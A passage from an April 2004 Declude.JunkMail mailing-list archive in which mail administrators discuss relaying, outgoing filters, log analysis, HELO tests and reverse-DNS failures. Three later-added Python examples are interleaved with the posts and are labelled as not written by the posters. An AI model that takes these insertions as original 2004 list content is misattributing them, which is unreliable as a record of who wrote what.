have any SpamCop hits, and these might be primarily related to his
gateway accepting all locally addressed mail which then might get
bounced by his primary IMail server for being unaddressable (I'm
guessing here based on his lone abuse newsgroup listing). Even I have
this problem currently due to software limitations, and it's going to
cost me a good deal of money and time to create a work around so that I
can do envelope rejection on the gateways.

Overall I would say he's about as clean as they come and there's no
cause for alarm.

Matt



John Tolmachoff (Lists) wrote:

   Why are you so much different than other ISPs that you can not force
   authentication?
  
  Try to imagine having to contact thousands of subscribers and walk them
  through changing their settings. Even if we only took a minute to help each
  subscriber (and I can guarantee you a minute isn't even close to the time it
  would take to help our subscribers) we're looking at 5+ 24 hour days doing
  nothing but that.
 
 I, as well as every one else, understands that. What you need to do is
 formulate a plan to implement over say a month. Start with broadcast
 announcements and such. Then, start migrating your users in blocks. Yes, it
 would be a lot of work. But the results are worth it.
 
   If you really think about it, if you are not forcing
   authentication, you are ripe to allowing spamming and run-away viruses.
  
  Why? Could you please explain that logic to me as I don't understand it.
 
 I assume you are relaying for addresses in Imail SMTP. (If you are relaying
 for users or domains, you have no idea about relay settings.) That means
 that any one using one of those addresses can send out millions of spam
 e-mails through your server and there is nothing you can do about it. This
 includes users that may have viruses on their computers, and are now acting
 as robots.
 
 John Tolmachoff
 Engineer/Consultant/Owner
 eServices For You


-- 
=
MailPure custom filters for Declude JunkMail Pro.
http://www.mailpure.com/software/
=




RE: [Declude.JunkMail] New test

2004-04-21 Thread John Tolmachoff \(Lists\)
  That means
  that any one using one of those addresses can send out millions of spam
  e-mails through your server and there is nothing you can do about it.
 
 How is that statement correct? We scan all outgoing messages for spam and
 viruses and delete them if a message contains one or both.

I made a general cautionary warning statement. From the research
that Matt did and the fact that you are actively scanning all outgoing
messages, you are taking the needed steps to minimize the possible problem. 

If your IPs are all or mostly used by dialup users, that in itself, as Matt
pointed out, greatly reduces the possible problem.

Again, it was meant as a general warning.

John Tolmachoff
Engineer/Consultant/Owner
eServices For You




RE: [Declude.JunkMail] New test

2004-04-21 Thread ISPHuset Nordic
 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 System Administrator
 Sent: 21. april 2004 20:20
 To: [EMAIL PROTECTED]
 Subject: Re: [Declude.JunkMail] New test
 
 on 4/21/04 1:40 PM, John Tolmachoff (Lists) wrote:
 
  I assume you are relaying for addresses in Imail SMTP.
 
 Correct.
 
  That means
  that any one using one of those addresses can send out millions of 
  spam e-mails through your server and there is nothing you 
 can do about it.
 
 How is that statement correct? We scan all outgoing messages 
 for spam and viruses and delete them if a message contains 
 one or both.
 
And how do you can the spam if it's a legitimate user?

As long as you don't require authentication with a user name and password I can send
an email through your server as long as I have the correct address.

We had the same problem about 2 years ago.

Solved it by using the mailall function in Imail giving them a mail that they had to
do changes so and so to use our mailserver to send through.

Out of 140 000 mailaccounts we had around 150 contacting us by phone the first 2 - 3
days; after that it was going as usual.

Don't make the problem bigger than it is.

Benny



Re: [Declude.JunkMail] Filtering outgoing mail - silent failure

2004-04-21 Thread R. Scott Perry

Well I read the manual and searched the archives, but my efforts to filter
outgoing mail are not working. We have the pro version of Declude.
in the filter...
BODY 0 CONTAINS flibbertygibbet
SUBJECT 0 CONTAINS flibbertygibbet
in the Declude config file (last two entries) ...
OUTGO filter C:\IMail\Declude\OutgoingFilter.txt x 0 0
OUTGO COPYTO [EMAIL PROTECTED]

My first question would be: does any E-mail fail the OUTGO test?  If not, 
then it is probably an issue with the way the test is set up.  You can 
check the Declude JunkMail log file to see if any E-mail is failing the 
OUTGO test (you can type 'find "OUTGO" dec.log' from a command prompt 
to quickly see if any E-mails failed the test).



   -Scott
---
Declude JunkMail: The advanced anti-spam solution for IMail mailservers 
since 2000.
Declude Virus: Ultra reliable virus detection and the leader in mailserver 
vulnerability detection.
Find out what you've been missing: Ask for a free 30-day evaluation.



[Declude.JunkMail] Log analysis and test check scripts

2004-04-21 Thread Roger Eriksson
Hi,

My log analysis and test check scripts are available for download at:
http://www.botany.gu.se/download/decludescript/LOG_analysis.zip
http://www.botany.gu.se/download/decludescript/TEST_check.zip
The first script creates a list with the number of hits for each 
test, number of messages that are OK or whitelisted, and a spam 
summary (incoming messages, deleted spam, held spam, marked spam, 
non-spam).

The second script does a pairwise comparison between a specific test 
and all other tests regarding number of individual hits and number of 
shared hits (i.e. messages that fail both tests).

Both scripts have two modes, one where the analysis is based on all 
message hits and another where it is based on unique messages only 
(i.e. a message hit is only counted once irrespective of the number 
of recipients). The first mode is much faster, but they can give some 
interesting results when compared.

The scripts run under both Windows NT 4 and Windows 2000. They are 
pure Windows command scripts and therefore not as fast as some of the 
other log analysis tools. The analyses below took about one minute 
each in all mode.

/Roger

== Output from the log analysis script ==

Declude test results -- dec0420.log

--- Total number of hits --

AHBL-PROXY 4197
AHBL-RHSBL 1296
AHBL-SOURCE 362
BADHEADERS 2523
BASE64-PLUS 381
BASE64 762
CBL 16295
COMMENTS 64
DSBL 14287
DSN 2837
FORGEDLOCAL 685
GREYLIST 6
HELOBOGUS 5812
MAILFROM 1233
MAILPOLICE 902
MESSAGE OK 2672
NETBL 563
OPM 1945
ORDB 48
REVDNS 5752
RSL 1815
SBL 877
SNIFFER-ADULT 2860
SNIFFER-CASINO 44
SNIFFER-CREDIT 685
SNIFFER-EMAIL 87
SNIFFER-EXP 1494
SNIFFER-GEN 1374
SNIFFER-GREY 5
SNIFFER-INSUR 661
SNIFFER-MAL 2
SNIFFER-MEDIA 2437
SNIFFER-OBFUSC 555
SNIFFER-PHARM 5964
SNIFFER-PRINT 10
SNIFFER-RICH 889
SNIFFER-SCAM 107
SNIFFER-TOOLS 1
SNIFFER-TRAVEL 19
SNIFFER 17194
SORBS-DUHL 10199
SPAMCOP 17652
SPAMDOMAINS 3895
SPAMHEADERS 184
SPAMTRAP 150
SPFFAIL 405
SURBL 2761
URLDBL 152
WEIGHT15-19 553
WEIGHT20 18482
WHITELISTED 530
- Total number of messages 

Incoming: 21154
Held spam: 18482 (87%)
Marked spam: 553 (2%)
Non-spam: 2119 (10%)
== Output from the test check script ==

Test check results -- dec0420.log

---
Test: SBL
Total number of hits: 877
---
Shared with AHBL-PROXY (4197 hits): 58 (6%)
Shared with AHBL-RHSBL (1296 hits): 137 (15%)
Shared with AHBL-SOURCE (362 hits): 314 (35%)
Shared with BADHEADERS (2523 hits): 172 (19%)
Shared with BASE64-PLUS (381 hits): 13 (1%)
Shared with BASE64 (762 hits): 15 (1%)
Shared with CBL (16295 hits): 355 (40%)
Shared with COMMENTS (64 hits): 6 (0%)
Shared with DSBL (14287 hits): 165 (18%)
Shared with DSN (2837 hits): 94 (10%)
Shared with FORGEDLOCAL (685 hits): 23 (2%)
Shared with GREYLIST (6 hits): 0 (0%)
Shared with HELOBOGUS (5812 hits): 317 (36%)
Shared with MAILFROM (1233 hits): 21 (2%)
Shared with MAILPOLICE (902 hits): 371 (42%)
Shared with NETBL (563 hits): 15 (1%)
Shared with OPM (1945 hits): 2 (0%)
Shared with ORDB (48 hits): 0 (0%)
Shared with REVDNS (5752 hits): 445 (50%)
Shared with RSL (1815 hits): 2 (0%)
Shared with SNIFFER-ADULT (2860 hits): 219 (24%)
Shared with SNIFFER-CASINO (44 hits): 7 (0%)
Shared with SNIFFER-CREDIT (685 hits): 99 (11%)
Shared with SNIFFER-EMAIL (87 hits): 82 (9%)
Shared with SNIFFER-EXP (1494 hits): 77 (8%)
Shared with SNIFFER-GEN (1374 hits): 33 (3%)
Shared with SNIFFER-GREY (5 hits): 0 (0%)
Shared with SNIFFER-INSUR (661 hits): 39 (4%)
Shared with SNIFFER-MAL (2 hits): 0 (0%)
Shared with SNIFFER-MEDIA (2437 hits): 32 (3%)
Shared with SNIFFER-OBFUSC (555 hits): 30 (3%)
Shared with SNIFFER-PHARM (5964 hits): 156 (17%)
Shared with SNIFFER-PRINT (10 hits): 9 (1%)
Shared with SNIFFER-RICH (889 hits): 84 (9%)
Shared with SNIFFER-SCAM (107 hits): 1 (0%)
Shared with SNIFFER-TOOLS (1 hits): 1 (0%)
Shared with SNIFFER-TRAVEL (19 hits): 2 (0%)
Shared with SNIFFER (17194 hits): 871 (99%)
Shared with SORBS-DUHL (10199 hits): 197 (22%)
Shared with SPAMCOP (17652 hits): 659 (75%)
Shared with SPAMDOMAINS (3895 hits): 94 (10%)
Shared with SPAMHEADERS (184 hits): 34 (3%)
Shared with SPAMTRAP (150 hits): 0 (0%)
Shared with SPFFAIL (405 hits): 0 (0%)
Shared with SURBL (2761 hits): 20 (2%)
Shared with URLDBL (152 hits): 57 (6%)
Shared with WEIGHT15-19 (553 hits): 17 (1%)
Shared with WEIGHT20 (18482 hits): 860 (98%)
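
The two analyses described in this post can be sketched in Python as follows. This is an added example, not Roger's command scripts: it assumes hit lines shaped like the Declude log excerpt quoted later on this page (`<date> <time> Q<id> Msg failed <TEST> (...)`), the sample log is constructed, and the pairwise comparison is done in the unique-messages mode only. Percentages are truncated, which matches the figures in the output above.

```python
import re
from collections import Counter, defaultdict

# Shape of a hit line, taken from the Declude log excerpt quoted on this page:
#   04/21/2004 11:36:34 Qbf301a5d024003e8 Msg failed REVDNS (...). Action=IGNORE.
HIT_RE = re.compile(
    r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} "
    r"(?P<msg>Q[0-9a-f]+) Msg failed (?P<test>[A-Z0-9-]+) \("
)

# Constructed sample log: ids, descriptions and actions are made up.
# Message ...01 has two recipients, so its SBL and SNIFFER hits appear twice.
SAMPLE_LOG = """\
04/20/2004 10:00:01 Qaa00000000000001 Msg failed SBL (constructed). Action=IGNORE.
04/20/2004 10:00:01 Qaa00000000000001 Msg failed SNIFFER (constructed). Action=IGNORE.
04/20/2004 10:00:01 Qaa00000000000001 Msg failed SPAMCOP (constructed). Action=IGNORE.
04/20/2004 10:00:01 Qaa00000000000001 Msg failed WEIGHT20 (constructed). Action=HOLD.
04/20/2004 10:00:01 Qaa00000000000001 Msg failed SBL (constructed). Action=IGNORE.
04/20/2004 10:00:01 Qaa00000000000001 Msg failed SNIFFER (constructed). Action=IGNORE.
04/20/2004 10:00:07 Qaa00000000000002 Msg failed SBL (constructed). Action=IGNORE.
04/20/2004 10:00:07 Qaa00000000000002 Msg failed REVDNS (constructed). Action=IGNORE.
04/20/2004 10:00:09 Qaa00000000000003 Msg failed SNIFFER (constructed). Action=IGNORE.
04/20/2004 10:00:09 Qaa00000000000003 Msg failed SPAMCOP (constructed). Action=IGNORE.
04/20/2004 10:00:12 Qaa00000000000004 Msg failed REVDNS (constructed). Action=IGNORE.
04/20/2004 10:00:15 Qaa00000000000005 Msg failed SBL (constructed). Action=IGNORE.
04/20/2004 10:00:15 Qaa00000000000005 Msg failed SNIFFER (constructed). Action=IGNORE.
04/20/2004 10:00:16 Qaa00000000000005 (constructed line that is not a test hit)
"""


def parse_hits(lines):
    """Return (message_id, test) for every 'Msg failed' line; skip the rest."""
    hits = []
    for line in lines:
        m = HIT_RE.match(line)
        if m:
            hits.append((m.group("msg"), m.group("test")))
    return hits


def count_hits(hits, unique=False):
    """Hits per test. unique=True counts a message once per test,
    irrespective of how many recipients it was logged for."""
    if unique:
        hits = set(hits)
    return Counter(test for _msg, test in hits)


def shared_hits(hits, test):
    """Pairwise comparison on unique messages.

    Returns {other_test: (shared, other_total, pct)} where pct is the share of
    `test`'s messages that also failed other_test, truncated to an integer.
    """
    msgs_by_test = defaultdict(set)
    for msg, name in hits:
        msgs_by_test[name].add(msg)
    base = msgs_by_test.get(test, set())
    result = {}
    for other in sorted(msgs_by_test):
        if other == test:
            continue
        shared = len(base & msgs_by_test[other])
        pct = shared * 100 // len(base) if base else 0
        result[other] = (shared, len(msgs_by_test[other]), pct)
    return result


if __name__ == "__main__":
    hits = parse_hits(SAMPLE_LOG.splitlines())
    for name, n in sorted(count_hits(hits, unique=True).items()):
        print(name, n)
    for other, (shared, total, pct) in shared_hits(hits, "SBL").items():
        print(f"Shared with {other} ({total} hits): {shared} ({pct}%)")
```

A test whose hits are almost entirely shared with a heavier test adds little independent signal, which is what the pairwise view is for when tuning weights.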


[Declude.JunkMail] Any recommendations for MS Exchange spam filter?

2004-04-21 Thread Larry Craddock
Anyone know if there's anything similar to declude for MS Exchange server?

thanks,

Larry Craddock



[Declude.JunkMail] Obvious, but it was new for me

2004-04-21 Thread Colbeck, Andrew
I just saved some processing power..

One of my most important text filters is the BODY search for URL stuff.  But
it's quite big.  To keep my loglevels in check, I use LOGLEVEL MID, which
doesn't log the individual lines triggered.  But whether I use MID or HIGH,
the line numbers are only significant if I'm not changing the order, right?
So I bottom-post my new filter entries.

Back in December, I cut the big file in half, then whenever the
short-circuit logic was added, I placed the bottom-most text first in my
global.cfg and that helped too.

I just gave up on bottom-posting, and LIFO reversed the files.  I've
definitely noticed that our average CPU usage during our peak periods has
gone down.

Which tells me that I'll probably want to keep that file smaller and go back
to bottom-posting and keep logically named sets of files...

The main file is about 1000 entries, all BODY searches.

(And no, I'm not going to post it to this list!)

Andrew 8)


Re: [Declude.JunkMail] Log analysis and test check scripts

2004-04-21 Thread Nick Hayer
On 21 Apr 2004 at 21:24, Roger Eriksson wrote:

*very* nice job Roger - 

Thanks!

-Nick Hayer

 Hi,
 
 My log analysis and test check scripts are available for download at:
 http://www.botany.gu.se/download/decludescript/LOG_analysis.zip
 http://www.botany.gu.se/download/decludescript/TEST_check.zip
 
 The first script creates a list with the number of hits for each test,
 number of messages that are OK or whitelisted, and a spam summary
 (incoming messages, deleted spam, held spam, marked spam, non-spam).
 
 The second script does a pairwise comparison between a specific test
 and all other tests regarding number of individual hits and number of
 shared hits (i.e. messages that fail both tests).
 
 Both scripts have two modes, one where the analysis is based on all
 message hits and another where it is based on unique messages only
 (i.e. a message hit is only counted once irrespective of the number of
 recipients). The first mode is much faster, but they can give some
 interesting results when compared.
 
 The scripts run under both Windows NT 4 and Windows 2000. They are
 pure Windows command scripts and therefore not as fast as some of the
 other log analysis tools. The analyses below took about one minute
 each in all mode.
 
 /Roger
 
 

Re: [Declude.JunkMail] Obvious, but it was new for me

2004-04-21 Thread Scott Fisher
My Body URL observations:

I've noticed that using SURBL filter has dramatically cut down on the hits of my 5 URL
Body filters.  My five filters are for .biz, .info, .com, .net and other, it's just
easier for me to maintain them that way.

So I've moved the SURBL filter higher in my list of tests and the bodyURL's are some of
the last tests run.

If you run SPAMCHK, it logs out all of the URL's it finds. 

Scott Fisher
Director of IT
Farm Progress Companies

 [EMAIL PROTECTED] 04/21/04 02:52PM 
I just saved some processing power..
 
One of my most important text filters is the BODY search for URL stuff.  But
it's quite big.  To keep my loglevels in check, I use LOGLEVEL MID, which
doesn't log the individual lines triggered.  But whether I use MID or HIGH,
the line numbers are only significant if I'm not changing the order, right?
So I bottom-post my new filter entries.
 
Back in December, I cut the big file in half, then whenever the
short-circuit logic was added, I placed the bottom-most text first in my
global.cfg and that helped too.
 
I just gave up on bottom-posting, and LIFO reversed the files.  I've
definitely noticed that our average CPU usage during our peak periods has
gone down.
 
Which tells me that I'll probably want to keep that file smaller and go back
to bottom-posting and keep logically named sets of files...
 
The main file is about 1000 entries, all BODY searches.
 
(And no, I'm not going to post it to this list!)
 
Andrew 8)



[Declude.JunkMail] Failed Spamdomains Why

2004-04-21 Thread Kevin Bilbee
Scott I thought if there was a DNS failure that SPAMDOMAINS would not fail
but pass the email??? This message failed Spam domains when there was a DNS
failure on Microsoft's end?


Declude Version 1.78i18

*** Declude Log ***
04/21/2004 11:36:34 Qbf301a5d024003e8 Msg failed REVDNS (This E-mail was
sent from a MUA/MTA 207.68.163.152 with no reverse DNS entry.).
Action=IGNORE.
04/21/2004 11:36:34 Qbf301a5d024003e8 Msg failed SPAMDOMAINS (Spamdomain
'hotmail.com' found: Address of [EMAIL PROTECTED] sent from invalid [No
Reverse DNS].). Action=IGNORE.


*** RDNS Lookup from DNSStuff ***
How I am searching:
Asking d.root-servers.net for 152.163.68.207.in-addr.arpa PTR record:
   d.root-servers.net says to go to ginseng.arin.net. (zone:
207.in-addr.arpa.)
Asking ginseng.arin.net. for 152.163.68.207.in-addr.arpa PTR record:
   ginseng.arin.net says to go to dns1.sj.msft.net. (zone:
163.68.207.in-addr.arpa.)
Asking dns1.sj.msft.net. for 152.163.68.207.in-addr.arpa PTR record:  Error:
dns1.sj.msft.net reports a SERVER FAILURE.

Answer:
An error occurred: Server dns1.sj.msft.net is reporting a server failure (it
is probably broken).

Details:
I could not get to the nameserver authoritative for
152.163.68.207.in-addr.arpa, because one or more of them aren't working
properly right now.  Sorry!



Re: [Declude.JunkMail] Failed Spamdomains Why

2004-04-21 Thread R. Scott Perry

Scott I thought if there was a DNS failure that SPAMDOMAINS would not fail
but pass the email??? This message failed Spam domains when there was a DNS
failure on Microsoft's end?

It depends on the failure:

An error occurred: Server dns1.sj.msft.net is reporting a server failure (it
is probably broken).

In this case, Declude JunkMail assumes that if it gets a response with no 
reverse DNS entry in it, that there is no reverse DNS entry.  If Microsoft 
replies and says that its server is broken, well, they do not have a 
reverse DNS entry.

   -Scott
---
Declude JunkMail: The advanced anti-spam solution for IMail mailservers 
since 2000.
Declude Virus: Ultra reliable virus detection and the leader in mailserver 
vulnerability detection.
Find out what you've been missing: Ask for a free 30-day evaluation.



RE: [Declude.JunkMail] Failed Spamdomains Why

2004-04-21 Thread Kevin Bilbee
OK I get that. I was under the assumption that if there was a DNS failure
that DNS based tests would not fail.

So I am assuming I am correct and incorrect. If the DNS server that Imail is
configured to communicate with has failed it will pass the tests but if the
remote server that is responsible for the RDNS has failed declude treats it
like there is no RDNS.


Kevin Bilbee

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] Behalf Of R. Scott Perry
 Sent: Wednesday, April 21, 2004 2:07 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [Declude.JunkMail] Failed Spamdomains Why



 Scott I thought if there was a DNS failure that SPAMDOMAINS would not fail
 but pass the email??? This message failed Spam domains when there was a DNS
 failure on Microsoft's end?

 It depends on the failure:

 An error occurred: Server dns1.sj.msft.net is reporting a server failure (it
 is probably broken).

 In this case, Declude JunkMail assumes that if it gets a response with no
 reverse DNS entry in it, that there is no reverse DNS entry.  If Microsoft
 replies and says that its server is broken, well, they do not have a
 reverse DNS entry.

 -Scott
 ---
 Declude JunkMail: The advanced anti-spam solution for IMail mailservers
 since 2000.
 Declude Virus: Ultra reliable virus detection and the leader in
 mailserver
 vulnerability detection.
 Find out what you've been missing: Ask for a free 30-day evaluation.



RE: [Declude.JunkMail] HELOBOGUS, HELOISIP and HELOISIPX questions

2004-04-21 Thread Goran Jovanovic
OK I think I was somehow reversed in my thinking


 
 Goran Jovanovic
 The LAN Shoppe


 
 Goran Jovanovic wrote:
 
 This is parts of a header I received and I just want to check a few
 things
 
 So the spammer thought that he would use my IP address in the HELO line
 205.150.108.8 to identify his domain, even though his real IP address is
 220.185.227.109?
 
 Obviously an IP address is not a valid domain so it fails the HELOBOGUS
 test?
 
 It failed the HELOISIP test because the domain was an IP address?
 
 Yes.  It would be more correct to say that HELOISIP failed because the
 domain _contained_ an IP address.  205.150.108.8.this.is.a.host.name
 would also have failed HELOISIP
 
 It failed the HELOISIPX test ... not sure why since there is no reverse
 DNS to parse?
 
 It failed HELOISIPX because the host name is a pure IP address.
 205.150.108.8.this.is.a.host.name will *not* fail HELOISIPX.
 
 In the next release, both tests will not fail host names in bracketed IP
 format [205.150.108.8]
 
 --
 ---
 illigitimi non carborundum
 ---
 Bud Durland, CNE Mold-Rite Plastics
 Network Administrator http://www.mrpcap.com
 ---
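
The distinction drawn in the quoted reply (HELOISIP fires when the HELO name contains an IP address, HELOISIPX only when it is a pure IP address, and the bracketed form is to be exempted in the next release) can be written out as below. This is an added illustration, not Declude's code; the function names and the `exempt_bracketed` switch are hypothetical, and treating a bracketed literal as a hit when the exemption is off is inferred from the thread.

```python
import re

# One IPv4 octet (0-255) and a dotted quad built from it.
_OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
_QUAD = rf"{_OCTET}(?:\.{_OCTET}){{3}}"

# A dotted quad anywhere in the string, not glued to further digits.
_CONTAINS_IP = re.compile(rf"(?<![\d.]){_QUAD}(?!\d)")
_PURE_IP = re.compile(_QUAD)
_BRACKETED = re.compile(rf"\[{_QUAD}\]")


def is_bracketed_literal(helo):
    """True for the address-literal form, e.g. [205.150.108.8]."""
    return _BRACKETED.fullmatch(helo.strip()) is not None


def heloisip(helo, exempt_bracketed=True):
    """Fires when the HELO name contains an IP address anywhere."""
    helo = helo.strip()
    if exempt_bracketed and is_bracketed_literal(helo):
        return False
    return _CONTAINS_IP.search(helo) is not None


def heloisipx(helo, exempt_bracketed=True):
    """Fires only when the HELO name is nothing but an IP address."""
    helo = helo.strip()
    if is_bracketed_literal(helo):
        if exempt_bracketed:
            return False
        helo = helo[1:-1]  # assumption: without the exemption, brackets are ignored
    return _PURE_IP.fullmatch(helo) is not None


def helo_findings(helo, exempt_bracketed=True):
    """Names of the two tests that fire for this HELO string."""
    found = []
    if heloisip(helo, exempt_bracketed):
        found.append("HELOISIP")
    if heloisipx(helo, exempt_bracketed):
        found.append("HELOISIPX")
    return found


if __name__ == "__main__":
    for sample in ("205.150.108.8", "205.150.108.8.this.is.a.host.name",
                   "[205.150.108.8]", "mail.example.com"):
        print(sample, helo_findings(sample))
```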



RE: [Declude.JunkMail] Obvious, but it was new for me

2004-04-21 Thread Markus Gufler

 If you run SPAMCHK, it logs out all of the URL's it finds. 

...if the Log level is set high enough.
Note that it logs any URL regardless if identified as spam or legit message.

Markus





RE: [Declude.JunkMail] Filtering outgoing mail - silent failure

2004-04-21 Thread R. Scott Perry

I sent an email from within our domain (containing that word in both the
subject and body) to an external account. Then checked the Declude log.
Nothing.

That's what I suspected -- that means that there is a problem with the way 
that the test is set up.

Are you sure that the filter file is named the same as the way that it is 
defined in the global.cfg file?  Are you sure that you are running Declude 
JunkMail Pro (\IMail\Declude -diag from a command prompt will show 
you)?  Is the problem only occurring with the last line in the file (if you 
cannot move a cursor to the line below it, you need to hit ENTER at the end 
of the line for Windows to recognize the line)?

   -Scott
---
Declude JunkMail: The advanced anti-spam solution for IMail mailservers 
since 2000.
Declude Virus: Ultra reliable virus detection and the leader in mailserver 
vulnerability detection.
Find out what you've been missing: Ask for a free 30-day evaluation.



RE: [Declude.JunkMail] Failed Spamdomains Why

2004-04-21 Thread R. Scott Perry

> OK I get that. I was under the assumption that if there was a DNS failure
> that DNS based tests would not fail.

If there is a timeout, Declude JunkMail will not fail the test.  But if it 
gets a response back that doesn't include an answer, it will fail the test.

   -Scott


RE: [Declude.JunkMail] Failed Spamdomains Why

2004-04-21 Thread Chuck Schick
FYI -

There is not a DNS failure on Microsoft's end.  Microsoft for some reason
has no reverse dns for a whole bunch of their mail servers causing mail from
MSN and Hotmail to fail both spamdomains and revdns.   I have contacted
Microsoft and they said it would be fixed yesterday.  What a mess.

Chuck Schick
Warp 8, Inc.
303-421-5140
www.warp8.com


> -----Original Message-----
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of Kevin Bilbee
> Sent: Wednesday, April 21, 2004 3:04 PM
> To: [EMAIL PROTECTED]
> Subject: [Declude.JunkMail] Failed Spamdomains Why
>
> Scott I thought if there was a DNS failure that SPAMDOMAINS would not fail
> but pass the email??? This message failed Spam domains when there was a DNS
> failure on Microsoft's end?
>
> Declude Version 1.78i18
>
> *** Declude Log ***
> 04/21/2004 11:36:34 Qbf301a5d024003e8 Msg failed REVDNS (This E-mail was sent from a MUA/MTA 207.68.163.152 with no reverse DNS entry.). Action=IGNORE.
> 04/21/2004 11:36:34 Qbf301a5d024003e8 Msg failed SPAMDOMAINS (Spamdomain 'hotmail.com' found: Address of [EMAIL PROTECTED] sent from invalid [No Reverse DNS].). Action=IGNORE.
>
> *** RDNS Lookup from DNSStuff ***
> How I am searching:
> Asking d.root-servers.net for 152.163.68.207.in-addr.arpa PTR record:
> d.root-servers.net says to go to ginseng.arin.net. (zone: 207.in-addr.arpa.)
> Asking ginseng.arin.net. for 152.163.68.207.in-addr.arpa PTR record:
> ginseng.arin.net says to go to dns1.sj.msft.net. (zone: 163.68.207.in-addr.arpa.)
> Asking dns1.sj.msft.net. for 152.163.68.207.in-addr.arpa PTR record:  Error:
> dns1.sj.msft.net reports a SERVER FAILURE.
>
> Answer:
> An error occurred: Server dns1.sj.msft.net is reporting a server failure (it
> is probably broken).
>
> Details:
> I could not get to the nameserver authoritative for
> 152.163.68.207.in-addr.arpa, because one or more of them aren't working
> properly right now.  Sorry!

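
The rule Scott states in this thread (a timeout does not fail a DNS-based test, a response that carries no answer does), sketched as an added example; it is not Declude's code and not from any poster. It assumes "no answer" means an answer count of zero in the DNS header, whatever the response code, and the reply packets are constructed test data.

```python
import struct

HEADER = struct.Struct("!HHHHHH")   # ID, flags, QD/AN/NS/AR counts (RFC 1035)
RCODES = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN"}

def encode_name(name):
    """Dotted name -> DNS wire format (length-prefixed labels, zero terminator)."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"

def build_reply(ip, rcode, target=None):
    """Constructed sample reply to a PTR query (test data, not captured traffic)."""
    qname = encode_name(".".join(ip.split(".")[::-1]) + ".in-addr.arpa")
    question = qname + struct.pack("!HH", 12, 1)          # QTYPE=PTR, QCLASS=IN
    flags = 0x8000 | 0x0100 | 0x0080 | rcode              # QR, RD, RA, RCODE
    answer = b""
    if target:
        rdata = encode_name(target)
        # compressed pointer to the question name at offset 12, PTR, IN, TTL, RDLENGTH
        answer = struct.pack("!HHHIH", 0xC00C, 12, 1, 3600, len(rdata)) + rdata
    return HEADER.pack(0x1234, flags, 1, 1 if target else 0, 0, 0) + question + answer

def classify(reply):
    """reply: raw response bytes, or None for a timeout. Returns (test_failed, reason)."""
    if reply is None:
        return (False, "timeout: test not failed")
    if len(reply) < HEADER.size:
        # Assumption: an unparseable packet is handled like no response at all.
        return (False, "short packet: test not failed")
    _id, flags, _qd, ancount, _ns, _ar = HEADER.unpack_from(reply)
    rcode = RCODES.get(flags & 0x000F, "RCODE%d" % (flags & 0x000F))
    if ancount == 0:
        return (True, rcode + " with no answer: test failed")
    return (False, "%s with %d answer(s): test not failed" % (rcode, ancount))

IP = "207.68.163.152"   # sending address from the log in this thread
CASES = {
    "timeout": None,
    "servfail": build_reply(IP, 2),
    "nxdomain": build_reply(IP, 3),
    "nodata": build_reply(IP, 0),
    "ptr": build_reply(IP, 0, "mail.example.net"),   # constructed host name
}

if __name__ == "__main__":
    for label, reply in CASES.items():
        print("%-9s %s" % (label, classify(reply)))
```

Under this rule a SERVFAIL from the authoritative server is scored the same as a genuinely missing PTR record, which matches the REVDNS and SPAMDOMAINS hits in the log above.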


RE: [Declude.JunkMail] Obvious, but it was new for me

2004-04-21 Thread John Tolmachoff (Lists)
If you are using Spamchk, you can use an external file there. That is what I
do with my body URL filter. It is much quicker to parse from Spamchk than as
a filter in Declude.

John Tolmachoff
Engineer/Consultant/Owner
eServices For You

> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:Declude.JunkMail-
> [EMAIL PROTECTED] On Behalf Of Scott Fisher
> Sent: Wednesday, April 21, 2004 1:31 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [Declude.JunkMail] Obvious, but it was new for me
>
> My Body URL observations:
>
> I've noticed that using SURBL filter has dramatically cut down on the hits
> of my 5 URL Body filters.  My five filters are for .biz, .info, .com, .net
> and other, it's just easier for me to maintain them that way.
>
> So I've moved the SURBL filter higher in my list of tests and the bodyURL's
> are some of the last tests run.
>
> If you run SPAMCHK, it logs out all of the URL's it finds.
>
> Scott Fisher
> Director of IT
> Farm Progress Companies
>
> [EMAIL PROTECTED] 04/21/04 02:52PM
> I just saved some processing power..
>
> One of my most important text filters is the BODY search for URL stuff. But
> it's quite big.  To keep my loglevels in check, I use LOGLEVEL MID, which
> doesn't log the individual lines triggered.  But whether I use MID or HIGH,
> the line numbers are only significant if I'm not changing the order, right?
> So I bottom-post my new filter entries.
>
> Back in December, I cut the big file in half, then whenever the
> short-circuit logic was added, I placed the bottom-most text first in my
> global.cfg and that helped too.
>
> I just gave up on bottom-posting, and LIFO reversed the files.  I've
> definitely noticed that our average CPU usage during our peak periods has
> gone down.
>
> Which tells me that I'll probably want to keep that file smaller and go back
> to bottom-posting and keep logically named sets of files...
>
> The main file is about 1000 entries, all BODY searches.
>
> (And no, I'm not going to post it to this list!)
>
> Andrew 8)
 